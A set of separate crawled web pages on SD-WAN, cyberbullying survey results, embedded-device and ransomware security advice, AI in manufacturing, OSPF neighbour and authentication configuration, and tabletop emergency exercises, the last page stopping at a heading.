SD-WAN technology can provide fast, reliable and relatively inexpensive data connectivity between the main office or data center of business with its branches. Compared to the alternative of using a single and expensive internet line, an SD-WAN can significantly cut WAN expenses. Beyond such cost savings, businesses can get reliable, general internet access for offices through the internet connection at the main office.
Many companies are turning to software defined wide area network technology to solve a wide range of network connectivity and performance issues, and boost their business results. Benefits to organizations include:
SD‐WAN delivers the advantages of a dependable, secure WAN service at internet prices. Broadband is more economical and flexible than expensive carrier-grade MPLS connections that typically have long provisioning times and costly contracts. With SD-WAN technology companies can use all available network connections to their full capacity without maintaining unused backup links.
SD-WAN technology distributes security at the branch level, avoiding the limitations of data having to return to a data center for added security protections such as firewall gateways or domain name system (DNS) enforcement. SD-WANs encrypt WAN traffic as it changes locations. It segments the network, minimizing damage if a breach occurs. SD-WANs can also help IT administrators detect attacks more quickly by letting them monitor the amount and types of traffic on a network. There is added security because SD-WANs allow for the use of virtual private networks (VPNs).
SD-WAN allows businesses to easily add or remove WAN connections – as well as combine cellular and fixed-line connections. Branches become more agile because SD-WANs allows multiple links, devices and services to coexist with the older infrastructure. With SD-WAN technology, the main office can quickly deploy WAN services to a distant site without having to send IT personnel there. Businesses can reduce deployment and configuration times with the more agile SD-WAN technology. In fact, network agility was recently cited as a key reason why business are adopting SD-WANs, according to a recent industry survey.
SD‐WAN makes deploying branch-level WAN services fast and simple. Because SD-WANs are based on a central cloud architecture, businesses find it easy to scale across the many endpoints. Companies can streamline branch infrastructure by inserting network services — whether in the cloud, branch edge or in data centers. IT staff have the ability to globally automate zero-touch deployment with a single management interface. SD-WAN offers services like WAN optimization, so fewer network appliances are needed at each location.
Improve the user experience
Because an SD-WAN uses a central control function to direct traffic across the WAN, it increases application performance and enhances the user experience – along with increased user productivity and reduced IT costs. SD-WANs can provide a superior cloud application performance from multiple clouds to multiple end users in multiple locations. If a link fails or there is degradation, the SD-WAN can route can dynamically route traffic between dedicated circuits and secure internet connections – without interruptions to essential applications.
Gain better performance
SD-WAN technology uses the internet to create secure, high-performance connections – removing MPLS network backhaul penalties. Business application optimization can be provided cost effectively, while greatly enhancing Software as a Service (SaaS) and other cloud-based services. Also, remote users typically experience less network latency and faster connections when using the cloud/SaaS‐based applications.
Companies are rapidly adopting software defined wide area network technology because of its many operational and financial benefits. In fact, the International Data Corporation (IDC) predicts that the SD-WAN infrastructure market will grow at a 40.4 percent compound annual growth rate, reaching $4.5 billion by 2022.
SD-WANs can solve a major business problem of ensuring reliable internet connectivity. Without robust connectivity, a business may face disruptions caused by link failures, network latency or WAN blackouts. These disruptions can be costly. Gartner estimates network downtime may cost up to $5,600 per minute, or more than $300,000 per hour.
In spite of all the advantages, SD-WAN control and management across multiple locations can still be a significant challenge for businesses with IT resource limitations. Many organizations are turning to third-party SD-WAN providers for SD-WAN management software solutions. One example is the GFI SD-WAN software from SD-WAN vendor, GFI Software.
With GFI SD-WAN, you can combine and manage up to twelve internet connections into a single, ultra-high-speed line through a bonding tunnel. With the overlay tunnel technology of GFI SD-WAN, the application flows can be kept alive even during WAN blackouts or brownouts, providing seamless session continuity.
GFI SD-WAN features include:
High-speed connectivity from branches to the headquarters/datacenter
High-speed general internet access at the branch office
Up to 75 percent cost reduction on monthly internet access fees and a faster return on investment
Plug-and-play transparent installation and an advanced SD-WAN router gateway
Another feature is GFI Software’s intelligent WAN automation. The overlay tunnels leverage advanced algorithms to monitor, remember, learn and react to a business’ network traffic in real-time and on the packet level. Services such as live video, VOIP, chat applications, file transfers or any other types of specific application flows are mapped onto corresponding overlay tunnels.
Connecting Branch and Central Offices Cost-effectively and Reliably
See how you can take advantage of low-cost transport technologies and carrier diversity to enable fast and reliable connectivity.
Introducing GFI SD-WAN
Watch this short video to see how SD-WAN technology can help you achieve exceptional application performance on your network.
Watch this on-demand webinar to discover how you can use GFI SD-WAN to easily connect central and branch offices and more. | <urn:uuid:c606bd16-c800-4dba-b976-70aa0b564c94> | CC-MAIN-2022-40 | https://www.gfi.com/company/blog/sd-wan | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00394.warc.gz | en | 0.921533 | 1,837 | 3.234375 | 3 |
Bullying used to be depicted as kids being shoved into lockers and coerced out of their lunch money by the older, more popular rulers of the school. Nowadays, the focus on bullying has shifted to those hiding behind computer screens and taunting others in the virtual world. While in-school bullying is on the rise, technology and social media have created alternate avenues for bullies to wreak havoc. Whether bullying is done on school grounds or over the phone, the consequences can be lifelong and even life-ending.
So how many kids are experiencing cyberbullying and how do their parents feel about it? To get a better idea of technology’s role in bullying, we surveyed more than 1,000 parents of children over the age of five and asked about their children’s cyberbullying experiences. Continue reading to see what we learned.
History of Harassment
High school students were bullied the most of any age group, according to their parents. Almost 60 percent of parents with children aged 14 to 18 reported them being bullied, but middle school-age children weren’t far behind. Fifty-six percent of parents with children aged 11 to 13 also reported their kids experienced bullying.
Nearly 83 percent of parents said the bullying happened at school, and 32 percent said it happened on the bus. While the majority of bullying occurred in physical locations, bullying on digital platforms occurred in a wider variety of outlets. Nineteen percent of bullying was through social media, and 11 percent was through text messages.
Online video games, internet sites other than social media, phone calls, and emails were also susceptible to bullying. The scary part of the digital world is that a person doesn’t even need to have an account on social media to be a victim of cyberbullying. The spread of private information and harmful words on social media sites can be saved and spread in the “real world,” eventually making it back to the victims.
How Do Parents Help?
Cyberbullying can make it difficult for parents to intervene or protect their children from becoming digital victims.
Around 59 percent of parents who reported their children being cyberbullied decided to talk to them about how to safely navigate the digital world. Forty-three percent of parents also adjusted the controls on their children’s accounts and blocked the offender. As many social media platforms have received backlash for their failure to act on cyberbullying, it seems it is up to the parents to block or censor their kids’ feeds to minimize bullies’ ability to reach them.
Unfortunately, the issue of failure to intervene is also directed at schools. While schools have some authority over what occurs on school grounds, cyberbullying can take place anywhere and usually occurs off campus. Multiple states have laws allowing schools to punish students involved in cyberbullying, but free speech issues can make it difficult to hold students accountable for off-campus acts. The pushback doesn’t sit well with the majority of parents, though.
Almost 66 percent of parents thought schools should hold kids accountable for off-campus cyberbullying – and their desires are supported by research. Studies have shown that cyberbullying is usually not completely off campus, with social media and internet harassment often being an indicator of in-school bullying. Even if the school doesn’t do anything to intervene, 35 percent of parents said they notified the school about a cyberbullying incident.
With social media playing such a large role in cyberbullying, which platforms put kids most at risk?
Parents were most concerned about Facebook: 51 percent thought the social media network posed the biggest cyberbullying threat. However, recent studies have shown Instagram is taking over in both the number of teen users and the risk of cyberbullying. Less than 13 percent of parents had concerns about Instagram, but a 2017 study by Ditch the Label found more than 2 in 5 people aged 12 to 20 experienced bullying on the platform.
The discrepancy between parental concerns and actual data may be due to parents’ increased presence on Facebook over Instagram. If parents aren’t actively using Instagram, they may be less likely to see the bullying or understand the increased risk.
Tech for Teens
Technology can be both helpful and harmful regarding children’s safety, and development. With numerous pros and cons, there doesn’t seem to be a magic answer for when children should be introduced to technological devices and how much time they should spend on them. However, when children get technology seems to depend on the type of technology.
Kids between the ages of six and 10 were more likely to have tablets compared to every other age group and significantly less likely to have smartphones. Smartphones jumped in popularity for kids aged 11 to 13, with 73 percent of parents reporting their middle school-age children having at least one device each.
While the average age at which kids got their first personal tech device was 9.8 years old, studies have shown cyberbullying is linked to the amount of time spent on social media rather than the age at which kids begin using technology. The more time children spend on social media, the higher their risk for cyberbullying. Parents reported their children spent an average of 1.8 hours a day on their personal devices. For the majority of children 18 and younger, parents had access to their devices. Ninety-six percent of parents with children aged six to 10 had access to their kids’ devices, a number that only dropped to over 82 percent for children aged 14 to 18. Significantly fewer parents with children aged 19 and older said they had access – almost a third, despite their kids being legal adults.
Having access to kids’ devices or limiting their screen time is less about overprotectiveness and more about helping children navigate the harm technology can bring. Even the leader of the technology world, Bill Gates, sets strict rules for his children regarding smartphone use, ultimately banning them until age 14.
Who’s on Which App?
Kids may be getting their own technology at a young age, but when are they creating their own social media accounts? According to parents, around 58 percent of children between the ages of 11 and 13 already had their own social media profiles. Surprisingly, so did 22 percent of kids aged 6 to 10. The top platforms for the youngest age group were Facebook and YouTube. The latter makes sense considering the increasing popularity of children’s video channels on YouTube.
However, a significant portion of parents with kids from all age groups reported their children had Instagram accounts. Remember, Instagram is now considered a playground for cyberbullying, and despite the minimum age requirement of 13 to create an account, over 11 percent of parents with children aged 6 to 10 reported their youngsters used the platform. Of course, every parent is different, and some children may be more prepared for the digital world than others, but here are some tips to consider before allowing your child onto social media.
Time Spent Scrolling
Looking at the amount of time kids spend on social media may not seem like a lot when broken down by day. Children aged 6 to 10 spent an average of 50 minutes a day on social media, while those aged 19 and older spent an average of 72.7 minutes online.
With most movies being over 70 minutes, the amount of time all age groups spend scrolling doesn’t seem like much. But when we take daily averages and extend them over a year, the numbers sound a lot more serious. Over a year, kids aged 6 to 10 spend an average of over 18,000 minutes on social media – that’s enough time to read the “Harry Potter” series nearly five times. Social media isn’t all bad, but limiting the amount of time kids spend on it each day can broaden their horizons to other activities and decrease their risk of being bullied.
Technology to Protect
Bullying is still ever-present on school grounds and is increasingly problematic online, especially on social media. Kids may get access to technology and sign up for social media at younger ages (sometimes even before the minimum age requirement), but our study revealed that parents are continuing to monitor their children’s use. From limiting their time to having access to their accounts, parents seem to be aware of the threats that technology and the internet possess and are working to protect their children as much as they can.
Parents shouldn’t depend on social media companies to step in and police themselves. As an alternative, parental monitoring software can help parents keep track of what their kids do on their phones and manage their activity accordingly. Some tools parental control tools may be included with your device, and a range of third-party vendors offer easy-to-use dashboards from which parents can filter content. Comparitech has detailed reviews and tutorials on the best parental control apps and software.
We surveyed 1,011 people. To qualify for the survey, people had to report having at least one child over the age of 5. If they had more than one child, respondents were asked to answer the survey based on their experiences with their oldest child.
Respondents were 59.3 percent women and 40.7 percent men. The average age was 42.1 with a standard deviation of 11.
Parts of this project include calculated averages. These were computed to account for outliers. This was done by finding the initial average and the standard deviation. The standard deviation was multiplied by three and added to the initial average. Any data point above this sum was excluded from the calculation of the final average.
When asked which social media accounts their children had, respondents were given the choices that appear in the final visualization, as well as the options of Tumblr, “I don’t know what accounts my child has,” and “Other.” These were excluded from the final visual due to low sample sizes. In the visual about which social media platforms posed the biggest risk for cyberbullying, Reddit and “Other” were also choices given to respondents, but they were excluded from our final visualization of the data.
Respondents answered the survey based on their experiences with their oldest children. It’s possible that respondents with multiple children had different or more acute experiences with their other children. Also, this survey is based on parents’ perspectives. Therefore, they may not have knowledge of all their children’s internet activities.
Fair Use Statement
Cyberbullying, like all bullying, is a serious issue that needs to be addressed by parents, kids, school administrators, and communities. Feel free to share this study and start a conversation about what is and isn’t acceptable when interacting through devices and on the internet. Any sharing should be done for noncommercial reuse. | <urn:uuid:2e3f514f-d299-4274-9cfd-b1874736ea2a> | CC-MAIN-2022-40 | https://www.comparitech.com/blog/vpn-privacy/boundless-bullies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335396.92/warc/CC-MAIN-20220929225326-20220930015326-00394.warc.gz | en | 0.965222 | 2,782 | 3.5 | 4 |
Today, the IT professional has a plethora of technology tools at his or her disposal. Each of these tools can solve complex problems; whether the focus is security, systems administration, networking, etc., the choices are endless.
Embedded devices are one of the tools that give an organization the ability to solve problems in new and exciting ways. However, embedded devices have very limited computing resources and strict power requirements, so writing the software requires much knowledge of both hardware components and programming.
Embedded devices only help run a single application and are usually completely enclosed by the object. Additionally, embedded devices may or may not be able to connect to the Internet.
Below we have outlined the benefits and vulnerabilities of embedded devices.
Benefits of Embedded Devices
Embedded Devices can provide local data management and data distribution capabilities that are safe, efficient, and secure while also being able to analyze, make decisions, and summarize data for other systems.
With the increase of the Internet of Things (IoT), embedded devices allow companies to increase their performance efficiency through aggregating and simplifying data and then delivering analytics that enable decisions to be made. More importantly, embedded devices can make data readily available whenever it is needed within a system, and via the Internet to a wider environment if need be. As the IoT continues to increase, so will the need to distribute intelligence across various platforms more efficiently, effectively, securely, and in real time.
Vulnerabilities of Embedded Devices
However, with all good things, come bad. If your embedded devices are poorly coded and have numerous weaknesses, your whole system could be disrupted or taken control. More often than not, embedded devices can be forgotten about, and the patches needed to fix vulnerabilities are put on the backburner, allowing breaches to happen more frequently. Just like any other device, embedded devices can be hacked.
To ensure that your vulnerabilities are negated, be sure to increase your firewalls and malware protection. In addition, you should regularly scan and patch your device so as to not cause an opportunity for a breach in security.
Hackers are only getting smarter, and we have people phishing, worms crawling, Trojan horses running, and polymorphic creatures self-replicating all over the Internet. We at Carson Inc. want to protect everything at the same time while also having it readily accessible. We will help you find what matters and control what counts while decreasing the chances of your embedded devices getting hacked.
Carson Inc. Combats Cyber Threats
Don’t sacrifice your security for convenience. Carson Inc. has been helping its customers fight the battle against cyber threats for more than 22 years. Our team consists of Information Assurance (IA) experts with advanced degrees and technical certifications, including CISSP, CISA, LPT, GWASP, and ISO 27001. Our staff has in-depth knowledge of IT security statutory and regulatory guidance. | <urn:uuid:60c6438e-260d-436f-9b0c-88207a9e8e9a> | CC-MAIN-2022-40 | https://www.carson-saint.com/2015/03/18/2015-5-7-the-benefits-and-vulnerabilities-of-embedded-devices/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00394.warc.gz | en | 0.937772 | 593 | 2.5625 | 3 |
Ransomware attacks have increased in popularity, and many outlets predict that it will be a $1 billion-dollar business this year. Ransomware is a form of malware that either locks users’ screens or encrypts users’ data, demanding that ransom be paid for the return of control or for decryption keys. Needless to say, but paying the ransom only emboldens the perpetrators and perpetuates the ransomware problem.
Ransomware is not just a home user problem, in fact many businesses and government agencies have been hit. Healthcare facilities have been victims. Even police departments have been attacked and lost valuable data. As one might expect, protecting against ransomware has become a top priority for CIOs and CISOs in both the public and private sectors.
Much of the cybersecurity industry has, in recent years, shifted focus to detection and response rather than prevention. However, in the case of ransomware, detection is pretty easy because the malware announces its presence as soon as it has compromised a device. That leaves the user to deal with the aftermath. Once infected, the choices are to:
- pay the ransom and hope that malefactors return control or send decryption keys (not recommended, and it doesn’t always work that way)
- wipe the machine and restore data from backup
Restoration is sometimes problematic if users or organizations haven’t been keeping up with backups. Even if backups are readily available, time will be lost in cleaning up the compromised computer and restoring the data. Thus, preventing ransomware infections is preferred. However, no anti-malware product is 100% effective at prevention. It is still necessary to have good, tested backup/restore processes for cases where anti-malware fails.
Most ransomware attacks arrive as weaponized Office docs via phishing campaigns. Disabling macros can help, but this is not universally effective since many users need to use legitimate macros. Ransomware can also come less commonly come from drive-by downloads and malvertising.
Most endpoint security products have anti-malware capabilities, and many of these can detect and block ransomware payloads before they execute. All end-user computers should have anti-malware endpoint security clients installed, preferably with up-to-date subscriptions. Servers and virtual desktops should be protected as well. Windows platforms are still the most vulnerable, though there are increasing amounts of ransomware for Android. It is important to remember that Apple’s iOS and Mac devices are not immune from ransomware, or malware in general.
If you or your organization do not have anti-malware packages installed, there are some no-cost anti-ransomware specialty products available. They do not appear to be limited-time trial versions, but are instead fully functional. Always check with your organization’s IT management staff and procedures before downloading and installing software. All the products below are designed for Windows desktops:
The links, in alphabetical order by company name, are provided as resources for consideration for the readers rather than recommendations.
Ransomware hygiene encompasses the following short-list of best practices:
- Perform data backups
- Disable Office macros by default if feasible
- Deliver user training to avoid phishing schemes
- Use anti-malware
- Develop breach response procedures
- Don’t pay ransom
Subscribe to our Podcasts
How can we help you | <urn:uuid:7222bf98-f129-4329-a027-4832ddc14cdf> | CC-MAIN-2022-40 | https://www.kuppingercole.com/blog/tolbert/dont-fall-victim-to-ransomware-links-to-free-tools | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337338.11/warc/CC-MAIN-20221002150039-20221002180039-00394.warc.gz | en | 0.928408 | 694 | 2.6875 | 3 |
As per profound research published in Annual Manufacturing Report 2018, 92% of senior executives in manufacturing acknowledge the calibre of “AI in Manufacturing”. It would not only enhance their productivity but turn their workforce smarter.
The significant gap between amounts of researches made in regards to AI innovations in manufacturing to minuscule implementation. This very fact reflects the lack of awareness and opportunity AI has to offer.
How AI in Manufacturing can be beneficial?
- Predictive Maintenance
- Predicting Possible failure modes
- Quality Checks
- Environmental Impact
- Digital Replica
- Generative Design
- Customer Service
- Price Forecasts
- Leveraging Data
Prominent Cases for AI in Manufacturin
AI has been game-changer on multiple fronts. The very calibre to transform manufacturing processes through AI-backed tools has been very part of growth. Let’s dwell deeper into some prominent aspects where Artificial Intelligence has been driving success to manufacturers.
1) Predictive Maintenance
Every mechanical instrument or one that is operating consistently requires maintenance at a certain point of time. Predicting or performing preventive maintenance can be tiring as well as costly.
Manufacturing companies can prevent unplanned machine downtime, through predictive maintenance. A perfectly webbed ecosystem of advanced sensors with manufacturing machinery optimises the overall manufacturing process.
2) Predicting Possible Failure Modes
At times, our predicaments around a certain object might overshadow possible failures. Failures can be in multiple forms and far from the visual imaginations. At times, an imperfect object might perform perfectly, whereas a perfect object can fail disastrously.
This ensures that perception to a certain set of objects and their performance won’t lead to operational failures. Artificial Intelligence backed eminent data can analyse possible failures. Companies can seamlessly figure out, areas that need to focus upon.
3) Quality Checks
Quality Control has been one of the most crucial aspects which can drive or drop companies growth. At times flaws are so minute to be detected by the expert human eye. Machine learning backed camera vision can “Segregate” products with certain imperfections. Further, the inspection could be undertaken by a human expert.
At times, the complete process can be fully automated, mitigating even the slightest human interferences. Adopting AI-backed manufacturing process would ascertain top quality commitments
4) Environmental Impact
Anything we manufacture, assemble or produce leaves a certain set of environmental footprint. All the natural resources that are ravaged to produce the final product, at the cost of harming the environment. Cutting on plastic consumptions and e-waste has just turned more of a necessity than just an option.
AI can significantly reduce waste while manufacturing of certain products. To a certain extent adopting AI in manufacturing can even reverse the environmental damages done over the years. Developing and optimising more eco-friendly material with higher sustainable services.
5) Digital Replica
A digital replica can be also termed as a virtual representation associated with a product, service or factory. Through sensors and data collection devices, one can create a digital replica to the model. Integrating and connecting data from all sensors and manufacturing instrument.
Real-time analysis based on physical items. The complete framework of components is connected with a cloud-based platform. The technology could help brands expand over multiple aspects.
6) Generative Design
Designing your objects is no longer a hassle. Adopting a generative design will offer multiple outputs adhering to certain criteria’s and parameters. Infusing your requirements such material, cost constraints & manufacturing process will fetch you with the liberty to choose from multiple alternatives.
The outputs generated through machines are based on analytics of Machine Learning. The design that would most efficiently comply with parameters or the one that fails. The algorithm finds multiple ways in which a product could be designed and produced. It also opens prospects for multi-functionary design alternatives.
7) Customer Service
Customer Service is one such aspect, often left-out in the manufacturing sector. however, it’s of the grave mistake business leaders commit and lose significant business. AI-backed solutions on the other hand imperative in predicting consumer expectations.
These solutions can right-away prompt critical issues leading to a better-personalised experience for consumers. Incorporating AI in manufacturing would strengthen your consumer engagement leading to better growth opportunities.
We shouldn’t be surprised by the fact, soon manpower in industries would be overtaken by robots. However conventional robots need to be programmed for the functions they need to perform. They are unified with the path of action they need to follow.
On the other hand, AI-powered robots no longer need to be programmed for tasks performance. These robots can seamlessly interpret CAD models, removing all sort of human interaction.
9) Price Forecasts
Manufacturing requires subsequent raw materials and supplies. Price fluctuations over this resources can often disrupt your balance sheets and leave a dent upon profits. Such an extensive instability in resources prices could leave your end product price commitments shaky.
To mitigate this issue, a better data-oriented AI algorithm would turn to be greatly helpful. Business leaders would be notified of the very accurate time to stock-up on their resources. Dynamic algorithms with multifaceted data could help in predicting prices with subsequent profit margins.
10) Leveraging Data
Although data usability at initials could be quite general. Manufacturers usually collect an immense amount of data while processing, operations and manufacturing. This Big data, when incorporated into advanced analytics based algorithm, would fortify eminent insights for business growth.
Including AI in manufacturing significantly impact parameters such as Risk Management, Supply Chain Management Product Quality, Predictions in Sales volume & Minimising on recall issues. This AI-based application can open up newer and better prospects for business growth.
Final Words: The Future of Manufacturing
Artificial Intelligence is particularly a revolutionizing technology irrespective of any industry. Consistent development and drop in the cost of operation have made it more accessible to a wide range of companies. On the other hand, the manufacturing sector has always been looking for a system upgrade which is efficient and cheaper.
AI in Manufacturing would fortify industry success with efficient and data-driven decisions. Business leaders can minimise their operational costs by optimising manufacturing processes leading to better service to their customers. | <urn:uuid:45770d37-3268-47a3-a59b-f0efad52545e> | CC-MAIN-2022-40 | https://katprotech.com/blog/top-10-use-cases-of-ai-in-manufacturing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00394.warc.gz | en | 0.927637 | 1,294 | 2.625 | 3 |
The neighbors on a same network segment is called as neighbors. The 2 routers are connected with one another to become the neighbors if it has the same subnet, area ID, hello or dead intervals and authentication. The neighbor process begins with the hello packets. The hello packet is sent periodically out of the every interface with the help of IP multicast. The routers become the neighbors as soon as they find themselves listed in a neighbors hello packet. It is the 2 way communication. This section will help you understand how to configure and verify the OSPF neighbor relationship and authentication.
The OSPF will directly encapsulate the 5 different types of the OSPF messages inside the IP packets by using the IP protocol 89. The packets are categorized into hello, database description (DBD or DD), link state request (LSR), link state update (LSU) and link state acknowledgement (LSAck). When the specific data link first reaches, the OOSPF routers will become neighbor as the first step using the hello messages. At this point, it exchange the topology information with the help of the other 4 OSPF messages. The OSPF router will keep the state machine for the every neighbor, listing the recent neighbor state in output command of show ip ospf neighbor. The neighbor state change as a neighbor progress via their messaging. When the neighbors settles down into the full state, then the process is over.
The OSPF routers will go through the series of the adjacency state while accomplishing the relation. Some of those states are transitory and will reflect in different stage of building the adjacency, when some are stable state in which the routers can, in topological changes absence, remain for the unlimited time period. The knowledge of the neighbor state is important to understand the OSPF adjacency troubleshooting and build up.
It is the initial state of the neighbor. It is the state which is mostly seen when the working adjacency to the neighbor is torn down or when the manually configured neighbor will not respond to the initial hello packets. Having the neighbor in a down state indicates that a router already knows about the neighbor IP address.
It is the valid state only on the non broadcast multi-access and the point to point nonbroadcast network. The neighbor is immediately placed into an attempt state and also contacted by the hello packets sent on the usual intervals on these networks. If the neighbor did not respond in between the dead interval, then it will be placed again back into a down state and connected at the reduced rate.
The neighbor is now placed into a Init state if the valid hello packets have been received from that, but the seen routers list in the hello packets will not contain a receiving RID of the router. It means that the router may hear the about the other router but is not at specific whether another router can hear the router here.
This state implies that a router is seen in its won router ID in a neighbor field of a neighbors hello packets, that means the bidirectional conversation is established. On the multi access networks, the neighbors should be in in that state or higher to get eligible and to elected as the BDR or DR. 2 will routers will then form the neighbor adjacency and also stay in the state if it is not the BDR or DR on a network segment.
If already the neighbor update dead timer, if not yet, then adds the new neighbor and also move to the next step.
The master slave is selected in this state. The router getting high priority can become the master if they have the same then the higher RD will break the tie. The master sends information at first to the slave.
In this state, the router begins to store the information in the memory. The slave will send LSR, mater reply with the LSU, in the same way master request for the missing information by LSR and the slave rely with the LSU. In this process, the neighbors will get synchronized.
The routers can describe the all the link state database by simply sing the database description packets. In this stage, the packets might be flooded to the other interfaces on a router.
In the full state the neighbors are synchronized, the SPF algorithm is run for the calculation shortest path. Neighbors are fully adjacent and an adjacencies will appear in the network LSA and Router LSA. At this state, the routing tables are recalculated or calculated, if an adjacency was reset.
Before getting into the configuration of OSPF neighbor relationship and authentication, it is important to know about the terms involved in the OSPF.
The router ID indicates the name of the router in an OSPF domain. Before the OSPF router sends any OSPF message, it should choose the unique 32 bit identifier which is also known as router identifier. In Cisco, if the router ID is configured manually, then it can be the router ID. If you have not configured the Router ID manually and a loopback interface arises, the highest loopback address can be a router ID. If the Loopback interface will not exist, the highest active physical interface address. In the router ID, the RID will not reachable and the OSPF can continue to use the RID learned from the physical interface however if an interface subsequently deleted or fails. The interface from where the RID is gotten will not have to be matched by the OSPF network command. If an RID is configured through the router ID command, then the command remains unchanged, the RID does not change for that router. If the RID changes, the rest of the router in a same area required to perform the new SPF calculation.
The hello protocol is the most important one which plays a major role in the neighbor relationship. It will perform many functions in the OSPF. It discovers the OSPF speaking neighbors and the hello packets will act as the keep alive in between the neighbors. It also advertises many parameters on which 2 routers have to agree before it becomes neighbors. The OSPF speaking routers will periodically send the hello packet out every OSPF enabled interfaces. This period is called as Hello interval. In the Cisco networks, the hello messages only sent once every ten seconds at the point to point network or broadcast and the hello messages are sent once every thirty seconds on the NBMA networks. In OSPF, every shared segment must have the BDR and DR, to prevent the unnecessary LSA flooding. If one or more neighbors in the subnet include their own interface address in n BDR field, then the neighbor with a higher priority becomes a BDR, if it is tie, the highest router ID has to be chosen
You can configure an OSPF by 2 ways, such as:
1. By ip ospf command under a desire interface which is supported by only IOS new versions
2. By network command under an OSPF process
In the below configuration, configured R2 and R1 by second method and another 2 by the first method.
Configuration for R1 as follows:
Configuration for R5 as follows:
Configuration for R4 as follows:
Configuration for R3 configuration as follows:
Use the command show ip route to find the 3 OSPF routes on the each router
End to end ping must be successful
The OSPf can authenticate each and every OSPF message. It is usually done to prevent the rogue router from injecting the false routing information and hence causing the denial of service attack. There are 3 types of authentication which is supported by the OSPF such as:
Plain text authentication or clear text authentication
The OSPF are fairly straightforward and easy to configure. While configuring the password, avoid entering the encryption type for the password on an interface. Rather than, use the global service password encryption command to enable all the password protection after the entire configuration is over. The null authentication is also known as the type 0 and it implies that no authentications are included in a packet header. It means it is default. The plain text is called known as the type 1 authentication, which uses the simple clear text password. The MD5 is also known as the type 2 authentication, which uses the MD5 cryptographic passwords. The authentication need not require to be set. Even it is set, all the peer routers on a same segment should have a same password as well as the authentication method. Take a look at the plain text and MD5 authentication types.
Take the below network example for the authentication:
The plain text authentication is mostly used when the devices within the area does not support the very secure MD5 authentication. This type authentication leaves an internetwork vulnerable to the sniffer attack in that packets are captured by the protocol analyzer and also the password may be readable. Even, it is useful while performing the reconfiguration, instead of the security.in case, the separate password is used for the newer and older OSPF routers, which shares the common broadcast network to prevent it from talking with one another. The plain text authentication will not have the same throughout the area, but it must be a same one between the neighbors.
The command of area authentication in the above configuration enables the authentication for the entire interfaces of a router in the specific area. The command of ip ospf authentication can also be used under an interface to configure the plain text authentication for an interface. This type of command can use if no authentication or different authentication method is configured under which area it belongs to. It also overrides an authentication configured for that area. It is the useful one if different interfaces that belongs to a same area required to use the different authentication method.
The MD5 authentication offers higher security than the plain text authentication. This authentication uses an MD5 algorithm to compute the hash value of the content of a password and OSPF packet. The hash value is transmitted in a packet with the non decreasing sequence number and key ID. Then the receiver knows that the same password, calculate the own hash value. Suppose no changes in the messages, then the hash value of a receiver must match to the sender hash value which is transmitted with a message.
Cisco recommends to use the command service password encryption on all the routers to configure. It causes a router to encrypt the password in in any configuration file display and also guards against a password being learned by acquiring a text copy of the router configuration.
The command area authentication message digest used in this configuration will enable the authentication for the entire router interfaces in the specific area. The command of ip ospf authentication message digest is also used under an interface to configure the MD5 authentication for the particular interface. That command is used if no authentication method or the different authentication method configured for that area. It is the most useful in case different interfaces which belongs to a same area require to use the different authentication methods.
After any configuration and authentication are very essential to verify it by using command or any relevant method.
Use the command show ip ospf interface to view the authentication configured for the interfaces.
The command of show ip ospf neighbor will display the neighbor table which comprises of the neighbor details.
The command show ip route will display the routing table.
You can learn OSPF authentication that allows the flexibility to authenticate the OSPF neighbors. It enables authentication in the OSPF to exchange the routing update information in a secure way. From the above section, you can grasp the types of neighbor state involved in the OSPF configuration. It will guide you how to configure and verify the OSPF neighbor relationship and authentication. In the authentication different methods of the OSPF authentication are discussed.
SPECIAL OFFER: GET 10% OFF
Pass your Exam with ExamCollection's PREMIUM files!
SPECIAL OFFER: GET 10% OFF
Use Discount Code:
A confirmation link was sent to your e-mail.
Please check your mailbox for a message from email@example.com and follow the directions.
Download Free Demo of VCE Exam Simulator
Experience Avanset VCE Exam Simulator for yourself.
Simply submit your e-mail address below to get started with our interactive software demo of your free trial. | <urn:uuid:866ce1da-fb15-420c-bc1a-dd398794c017> | CC-MAIN-2022-40 | https://www.examcollection.com/certification-training/ccnp-configure-verify-ospf-neighbor-relationship-and-authentication.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00394.warc.gz | en | 0.913355 | 2,536 | 3.171875 | 3 |
Preparing your organization for the unknown requires significant planning, forethought, and an organized effort to identify potential threats and take proactive steps to minimize risks. For many businesses, this type of focused preparation starts with creating an emergency plan. Over time, organizations may develop a more comprehensive business continuity plan for different scenarios—each intended to document and provide detailed instructions concerning how the organization will respond if/when an emergency occurs.
But, how can you know whether your emergency response or business continuity plan is sufficient before you need to put it in action? Thankfully, tabletop exercises are a great tool that provides employee safety and business continuity leaders a low-cost but high-impact way of determining emergency preparedness before a crisis occurs.
What Is a Tabletop Exercise?
A tabletop exercise (TTX) is a simulated, interactive exercise that tests an organization’s emergency response procedures. The Federal Emergency Management Agency (FEMA) defines tabletop exercises as “an instrument to train for, assess, practice, and improve performance in prevention, protection, response, and recovery capabilities in a risk-free environment.” For example, the agency—which coordinates emergency response following federally-declared disasters—regularly leverages tabletop exercises to test and validate policies, plans, procedures, equipment, and more. FEMA also relies on tabletop exercises to clarify roles and responsibilities to ensure interagency coordination and improve communication.
In tabletop exercises, key personnel with emergency management roles and responsibilities gather together to discuss various simulated emergency situations. Because the environment of a TTX is non-threatening (i.e., a “real” emergency is not happening), exercise participants can calmly rehearse their roles, ask questions, and troubleshoot problem areas.
How long should a tabletop exercise last?
A tabletop exercise’s duration depends on the scenario being rehearsed, the number of participants involved, and the objectives established ahead of time. Often they can be completed in as little as 2-4 hours; however, it is common for government agencies and large organizations to dedicate multiple days every quarter to testing response plans to large-scale scenarios.
What are the benefits of tabletop exercises?
Beyond providing a low-cost, low-risk, and highly effective way to assess emergency response plans before they are needed, well-designed tabletop exercises help individuals across the organization better understand their role in an emergency, providing a safe space to think critically about potential scenarios that could impact normal operations.
For safety and business continuity leaders, tabletop exercises also provide peace of mind and confidence that key personnel are adequately trained and prepared for critical events, which can drastically improve response times, potentially saving lives and protecting the business from significant losses.
Tabletop Exercises vs. Drills
